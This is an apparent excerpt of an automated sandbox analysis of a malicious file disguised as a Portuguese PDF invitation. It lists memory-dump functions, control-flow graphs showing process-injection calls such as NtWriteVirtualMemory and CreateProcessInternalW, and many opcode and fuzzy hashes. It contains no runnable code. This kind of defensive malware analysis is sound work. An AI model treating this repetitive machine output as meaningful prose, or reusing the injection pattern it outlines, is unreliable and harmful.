                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: ecfc7d0276b153707cd006ef0f1a68739104b8e63d4ec2af76962c3848e356fb
                        • Instruction ID: 0963f694605e4049904c08a60b8a4248a05ebe6dfcf1c7969630c539e9cebc24
                        • Opcode Fuzzy Hash: ecfc7d0276b153707cd006ef0f1a68739104b8e63d4ec2af76962c3848e356fb
                        • Instruction Fuzzy Hash: B242ABB1608389DFDB749F68CDA57EE7BB2BF58300F85812ADD8A9B210D3745A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A790F, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 561COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1840 20a790f-20a792d 1841 20a795f-20a7a34 call 20a796b call 20aba35 call 20aeebc 1840->1841 1852 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1841->1852 1853 20a8a32-20a8b3d call 20aeebc * 3 1841->1853 1852->1853 1884 20a7f06-20a7fd3 1852->1884 1887 20a7fd9-20a80ce call 20aeebc 1884->1887 1888 20a0f3e-20a0f60 call 20a0d4c 1884->1888 1887->1853 1895 20a80d4-20a829f 1887->1895 1900 20a750e-20a792d call 20adad0 1895->1900 1901 20a82a5-20a8383 call 20aeebc 1895->1901 1900->1841 1901->1853 1911 20a8389-20a83e9 1901->1911 1911->1853 1915 20a83ef-20a8425 1911->1915 1917 20a848c-20a84b7 1915->1917 1918 20a8427-20a8486 1915->1918 1917->1853 1920 20a84bd-20a85f2 1917->1920 1918->1853 1918->1917 1928 20a85f8-20a8713 call 20ac2a3 1920->1928 1929 20afaae-20afab2 1920->1929 1928->1853 1938 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1928->1938 1931 20afab3-20afb3c 1929->1931 1937 20afb42-20afb44 1931->1937 1938->1853 1943 20a8822-20a88f2 call 20aeebc 1938->1943 1943->1853 1948 20a88f8-20a89c1 call 20aeebc 1943->1948 1948->1853 1953 20a89c3-20a89fd call 20aeebc 1948->1953
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: 6c3fbf24d435b45b96b151df24fce0d5e57fa44222ba4a4d3389f18a6cc04bc5
                        • Instruction ID: ad892ce256b3c71ac44a1f3250ddacdd9d4f4cebaf7bbc8d4a240ab6235213ed
                        • Opcode Fuzzy Hash: 6c3fbf24d435b45b96b151df24fce0d5e57fa44222ba4a4d3389f18a6cc04bc5
                        • Instruction Fuzzy Hash: C132ABB16043899FDB749F68CD957EE7BB2FF58300F85812ADD8A9B210D3749A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7974, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 552COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1956 20a7974-20a7976 1957 20a7977-20a7a34 call 20a796b call 20aba35 call 20aeebc 1956->1957 1967 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1957->1967 1968 20a8a32-20a8b3d call 20aeebc * 3 1957->1968 1967->1968 1999 20a7f06-20a7fd3 1967->1999 2002 20a7fd9-20a80ce call 20aeebc 1999->2002 2003 20a0f3e-20a0f60 call 20a0d4c 1999->2003 2002->1968 2010 20a80d4-20a829f 2002->2010 2015 20a750e-20a7960 call 20adad0 2010->2015 2016 20a82a5-20a8383 call 20aeebc 2010->2016 2015->1957 2016->1968 2026 20a8389-20a83e9 2016->2026 2026->1968 2030 20a83ef-20a8425 2026->2030 2032 20a848c-20a84b7 2030->2032 2033 20a8427-20a8486 2030->2033 2032->1968 2035 20a84bd-20a85f2 2032->2035 2033->1968 2033->2032 2043 20a85f8-20a8713 call 20ac2a3 2035->2043 2044 20afaae-20afab2 2035->2044 2043->1968 2054 20a8719-20a881c call 20afaae NtWriteVirtualMemory 2043->2054 2047 20afab3-20afb3c 2044->2047 2053 20afb42-20afb44 2047->2053 2054->1968 2059 20a8822-20a88f2 call 20aeebc 2054->2059 2059->1968 2064 20a88f8-20a89c1 call 20aeebc 2059->2064 2064->1968 2069 20a89c3-20a89fd call 20aeebc 2064->2069
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: e2f53fabdd01d9a2ecc32f772a145f1c10fae6c98862e9da9523eac7c1c56701
                        • Instruction ID: 3068f20ab10cfd333cdc74990fd6d7fc0c627b57ec8b74198353f8b069428a00
                        • Opcode Fuzzy Hash: e2f53fabdd01d9a2ecc32f772a145f1c10fae6c98862e9da9523eac7c1c56701
                        • Instruction Fuzzy Hash: F632ABB16043899FDB749F68CDA57EE7BB2FF58300F85812ADD8A9B210D3749A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7963, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 536COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FSVC$Nx|M
                        • API String ID: 0-3345918652
                        • Opcode ID: cdce76b34f635b85a27c866b207815c62a9000d4eb9922456afa5e02584b619c
                        • Instruction ID: 1463555e0ab15e12a9b7f0d7300421bef305a6e5f528f7c06f28866181072e6c
                        • Opcode Fuzzy Hash: cdce76b34f635b85a27c866b207815c62a9000d4eb9922456afa5e02584b619c
                        • Instruction Fuzzy Hash: 2032BBB16043899FDB749F68C9A57EE7BB2FF54300F85812ADC8A9B210D3749A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A796E, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 535COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FSVC$Nx|M
                        • API String ID: 0-3345918652
                        • Opcode ID: 24bdcba9a108211ecee3e16606e4f9bf55b02ed868a14566747e5c82caed954c
                        • Instruction ID: 46dc8c08ee03500317b191655d289cce22e8faee2b57428474f8cb257f8af784
                        • Opcode Fuzzy Hash: 24bdcba9a108211ecee3e16606e4f9bf55b02ed868a14566747e5c82caed954c
                        • Instruction Fuzzy Hash: 9032CBB16043899FDB749F68C9A57EEBBB2FF58300F85812ADC8A9B210D3745A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A79FB, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 530COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: b3e60dc583088e3b37946d205cd25e6a9c5a97a433f4f0efd58837b870b87fe9
                        • Instruction ID: b1da018c9d289ec54b318609c11c8d85afde83d7dc400acf5b351ac1b43fa07e
                        • Opcode Fuzzy Hash: b3e60dc583088e3b37946d205cd25e6a9c5a97a433f4f0efd58837b870b87fe9
                        • Instruction Fuzzy Hash: D332CCB1604389DFDB749F68C9A57EE7BB2FF58340F85812ADC8A9B210D3745A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7A6F, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 518COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: c2f46c422830e8338ca4a07de9da5b7bb5f7f824214ab31b525a4e504a6e4d9c
                        • Instruction ID: 055cd114749d5eb9decfd3c0416ead26d594f6241759ee4c372d69a9955966c4
                        • Opcode Fuzzy Hash: c2f46c422830e8338ca4a07de9da5b7bb5f7f824214ab31b525a4e504a6e4d9c
                        • Instruction Fuzzy Hash: 5832CBB1604389DFDB749F68C9957EABBB2FF58340F85812ADC8A9B210D3745A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7AE7, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 500COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FSVC$Nx|M
                        • API String ID: 0-3345918652
                        • Opcode ID: b911f86e4596b356497d9794eaf13f49d088c044b113cc8a3d8de59b443e8d31
                        • Instruction ID: 4d0a1c1d38bff845085a1299024397629ae046a80bf84f5894d7dd760b47009a
                        • Opcode Fuzzy Hash: b911f86e4596b356497d9794eaf13f49d088c044b113cc8a3d8de59b443e8d31
                        • Instruction Fuzzy Hash: D922BCB16083899FDB749F68C9957EA7BB2FF58340F85812ADC8A9B210D3749A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AEEF5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE ref: 020AF607
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID: (:$ZpBl
                        • API String ID: 2186235152-656557683
                        • Opcode ID: e58c6f457604a6bc36d884a8ff36f0cfd77099f05c67206198196f46f0361e78
                        • Instruction ID: 783a608b065a13e1743f3b6107f13e16e661986fdeb3185320b561834443834e
                        • Opcode Fuzzy Hash: e58c6f457604a6bc36d884a8ff36f0cfd77099f05c67206198196f46f0361e78
                        • Instruction Fuzzy Hash: DA71A13150438ACFDF79DEA8C9B87ED77A2AF54300F91852ACC4A8BA54C7354A85DB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AEF2F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE ref: 020AF607
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID: (:$ZpBl
                        • API String ID: 2186235152-656557683
                        • Opcode ID: 864f80cd9e77a3c64eb1b898e90211e4aa8ffee8cd48959d1b10f59cda1ade7c
                        • Instruction ID: 93b304bbea953f40f98037f3dffc1927543cdb98ae703127d69b73ee73c5c2f4
                        • Opcode Fuzzy Hash: 864f80cd9e77a3c64eb1b898e90211e4aa8ffee8cd48959d1b10f59cda1ade7c
                        • Instruction Fuzzy Hash: ED71B33150434ACFDF79DEA8C9B87ED77A2BF54300F91852ACC4A8BA14C7354A85DB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AEF6B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 171processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE ref: 020AF607
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID: (:$ZpBl
                        • API String ID: 2186235152-656557683
                        • Opcode ID: 95c178d873b8c420ab6048d410bc1bcd196b96115440664dfd6632f67bf7e8e9
                        • Instruction ID: 60ad4b23ed52d88bbfb4c640850709b2b4a904f2cb610ad8838facd2a93010d3
                        • Opcode Fuzzy Hash: 95c178d873b8c420ab6048d410bc1bcd196b96115440664dfd6632f67bf7e8e9
                        • Instruction Fuzzy Hash: EC61B23150438ACFDF79DEA8C9B87ED37A2AF54300F91451ACC4A8BA14C7354A85DB46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7BA3, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 476COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 139200bb5b88a528228a32c1d4ef202516cbf307901190bfa8556245dbb58903
                        • Instruction ID: c8c2d249fd6c33dd478ec97e96937cccdb1196db795c436d1a388d5295a677de
                        • Opcode Fuzzy Hash: 139200bb5b88a528228a32c1d4ef202516cbf307901190bfa8556245dbb58903
                        • Instruction Fuzzy Hash: D722BCB1604389DFDB749F68C9557EA7BB2FF58340F85812ADC8A9B210D3749A41CF42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7C2F, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 455COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 380986a551c0982713e43c6b411e7c26797cae1037bf0845e7818aa66a5f282f
                        • Instruction ID: a4907290a97914a2a784bcb2882023f0d6370b976f8c808f15d66f0cf73b226c
                        • Opcode Fuzzy Hash: 380986a551c0982713e43c6b411e7c26797cae1037bf0845e7818aa66a5f282f
                        • Instruction Fuzzy Hash: AD12BA716083899FDB749F68C9957EA7BB2FF58340F85812ADC8A9B210D3749A41CF42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7C9B, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 443COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: dc2306e37d16daf1bd313745600741ef2e2518b0a43651d06c0f716e38955920
                        • Instruction ID: 36469c557f2284820a97356fb7a8099501891eb86e55e8fdb5ae1caff7657407
                        • Opcode Fuzzy Hash: dc2306e37d16daf1bd313745600741ef2e2518b0a43651d06c0f716e38955920
                        • Instruction Fuzzy Hash: A312BB71608388DFDB749E68CD557EA7BB2FF58340F85812ADC8A9B210D3749A81CF42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7D13, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 429COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: ee415f95e5deaf9b4822674cfdd24e52ec756ab603d2bc522e1defd08fe3acad
                        • Instruction ID: 959c66145aabc4f8aed45d354d05d01072ee6f5144a888da2905f18cf050ebac
                        • Opcode Fuzzy Hash: ee415f95e5deaf9b4822674cfdd24e52ec756ab603d2bc522e1defd08fe3acad
                        • Instruction Fuzzy Hash: DA02BC71608388DFDB759E68CDA57EE7BB2FF59340F85802ADC8A9B210D3745A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7D73, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 420COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: be67bd8e943ca0d6439e5b897efbedbdf8d4984f750971b21d0caa273e31e446
                        • Instruction ID: ebcc5c40ec15efb957ba228c8a2c2bd195819fbba61881b167283dde14774427
                        • Opcode Fuzzy Hash: be67bd8e943ca0d6439e5b897efbedbdf8d4984f750971b21d0caa273e31e446
                        • Instruction Fuzzy Hash: 7302AD71608388DFDB759E68CDA57EE7BB2FF59340F85802ADD8A9B210D3744A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7DEB, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 403COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 83b57b4c644151f7d786f3ba993561c5238c6917d4aaaabc8f27754a81eac9c4
                        • Instruction ID: 98f077e105cccd2d5446260d862e3fe4f69fbdc4634e9f8d9c1bea2564854b90
                        • Opcode Fuzzy Hash: 83b57b4c644151f7d786f3ba993561c5238c6917d4aaaabc8f27754a81eac9c4
                        • Instruction Fuzzy Hash: 1102AD71608388DFDB759E68CDA57EE7BB2FF58340F85802ADD8A9B210D3744A41DB06
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7E6F, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 383COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 2c8124f696a6bec1f9b1f737c66920d5e20be32da6b7c57a5882f104619bf41d
                        • Instruction ID: d8916bd63ee9347d71624200e0fe18a42a4f170968bd1dbcc9d0f60975e7eedd
                        • Opcode Fuzzy Hash: 2c8124f696a6bec1f9b1f737c66920d5e20be32da6b7c57a5882f104619bf41d
                        • Instruction Fuzzy Hash: 76F1AC71608388DFDB759E68CDA57EE7BB2FF58340F85802ADD8A9B210D3745A41DB02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7EE3, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 366COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 01bb1e8ca9580436168ba270d4c334b6e8f0e30ff3fd9166c4a414de774655c4
                        • Instruction ID: 98bd7cb4d2a3e3198ecec71d987bc8ac73517bdf17d9fa9ba7b37bc6465ad35b
                        • Opcode Fuzzy Hash: 01bb1e8ca9580436168ba270d4c334b6e8f0e30ff3fd9166c4a414de774655c4
                        • Instruction Fuzzy Hash: D9F1AC71608388DFDB759E68CDA57EE7BB2FF58340F85802ADD8A9B210D3745A41CB02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7F5B, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 352COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: ff4f6ca4ddf16f70928a3ec37e7598a393cbcc5e0e22391c566a3d4421589472
                        • Instruction ID: 5efcd8e071485ed348faac55b183282d8bd01cda99015ef5e3f611670bc0c567
                        • Opcode Fuzzy Hash: ff4f6ca4ddf16f70928a3ec37e7598a393cbcc5e0e22391c566a3d4421589472
                        • Instruction Fuzzy Hash: BEE1AC71608388DFDB799E68CDA57EE3BB2FF58350F85802ADD8A9B210D3745A41CB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8067, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 30012497cad72752c55f748a7bffdd297a8dc4b111f2f4e07a63997cd06e5d32
                        • Instruction ID: cf63e117292ac3429269841c588316bf52422b5cca52a4e25b5e145573296f95
                        • Opcode Fuzzy Hash: 30012497cad72752c55f748a7bffdd297a8dc4b111f2f4e07a63997cd06e5d32
                        • Instruction Fuzzy Hash: 98D1B971608388DFDB799E68CDA57EE3BB2FF58340F85802ADC8A8B210D7705A41CB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A80BB, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 308COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 6e30f634f3527bb919251e583d4d3a41a404d7570afbd57bbf0f1e43bfac4e11
                        • Instruction ID: 99545d18e04b46a3cfb4e1bfc81c9453883589071e9b14bc646276a7fd501ef8
                        • Opcode Fuzzy Hash: 6e30f634f3527bb919251e583d4d3a41a404d7570afbd57bbf0f1e43bfac4e11
                        • Instruction Fuzzy Hash: 80D1AA71608388DFDB798E68CDA57EE37B2FF58350F95802ADC8A8B210D7745A41CB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8130, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 294COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 6d8715884f731c7ee76fe3470ad653036f0f251de9c467b2aeba39c73f9fe31e
                        • Instruction ID: 894c9fd12620ee3f2616df5ae4b358d44f1d7f24821014b9b6068498fc988453
                        • Opcode Fuzzy Hash: 6d8715884f731c7ee76fe3470ad653036f0f251de9c467b2aeba39c73f9fe31e
                        • Instruction Fuzzy Hash: 29D1A9716083889FDB798F78CDA57EA3BA2FF58300F95802ADD8A8B210D7745A41DB15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A81BB, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: d5fb11a33a55b7aba01706c5a46e82cb1f29ceeccc0ef6a6a5b218aab04f65c6
                        • Instruction ID: 52ce8056eef218f9741c87d9ccac92c21cd7dc8b748f20cb6168110fe3a9bdaf
                        • Opcode Fuzzy Hash: d5fb11a33a55b7aba01706c5a46e82cb1f29ceeccc0ef6a6a5b218aab04f65c6
                        • Instruction Fuzzy Hash: 39C1AA71608388DFCF799E64CDA47EE7BA2FF98340F95802ADD8A8B210D3745A41DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A820F, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 265COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: 1f4f3e36784a7076154d98aa8c89de5851b9157b595118b9390da20789b08030
                        • Instruction ID: 14a61f8c5cd2723bc799d521933a8ed693b48cfd6e48f017211f9ac37ca04fbf
                        • Opcode Fuzzy Hash: 1f4f3e36784a7076154d98aa8c89de5851b9157b595118b9390da20789b08030
                        • Instruction Fuzzy Hash: 0DC1AB72608388DFDF799E64CDA47EE37A2FF98350F95802ADD8A8B210D7745A41DB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A826F, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 255COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Nx|M
                        • API String ID: 0-2341126701
                        • Opcode ID: d46678afee7cae1a0d3f203dd191fbe87a2e0d48009306040b4abeefed174ca9
                        • Instruction ID: 118346b45a4828501c84a059a14f54c1109a0fa6c9483841b6542d3831371286
                        • Opcode Fuzzy Hash: d46678afee7cae1a0d3f203dd191fbe87a2e0d48009306040b4abeefed174ca9
                        • Instruction Fuzzy Hash: 62B19A71608388DFDF758E64CDA47DA3BA2FFA8350F95802ADD8A8B210D7B45A41DB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A82FB, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
